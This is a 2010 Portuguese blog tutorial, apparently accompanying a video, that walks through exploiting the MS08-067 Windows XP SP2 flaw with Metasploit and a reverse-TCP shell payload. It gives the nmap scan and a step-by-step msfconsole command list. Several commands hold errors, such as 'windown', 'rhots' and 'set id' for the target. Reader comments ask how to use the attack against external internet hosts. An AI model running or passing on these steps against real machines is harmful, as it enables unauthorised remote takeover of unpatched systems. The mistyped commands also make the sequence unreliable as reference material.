banner468

quinta-feira, 13 de maio de 2010

Metasploit - Explorando falha MS08-067

Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:

Metasploit framework 3
Nmap

Exploit usado:

Citação:
ms08_067_netapi
Payload(carga) usado:
Citação:
shell_reverse_tcp
Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citação:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Baixar: http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm

Assistir on-line: http://bhior.blip.tv/file/3534979

2 comentários:

  1. Beleza valeu pela dica ,
    bhior você poderia nos mostrar como seria com ip externos sem ser da propria rede! usar o metasploit para internet

    valeu......

    ResponderExcluir
  2. Olá Bhior, utilizei essa tecnica e me retornou o seguinte erro. Login Failed. Execution Expired.

    Alguma falha de login? Teria como eu setar o login a ser usado? Pois a maquina na qual tentei conectar eu tenho todas as senhas de acesso.

    Valeu!

    ResponderExcluir

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers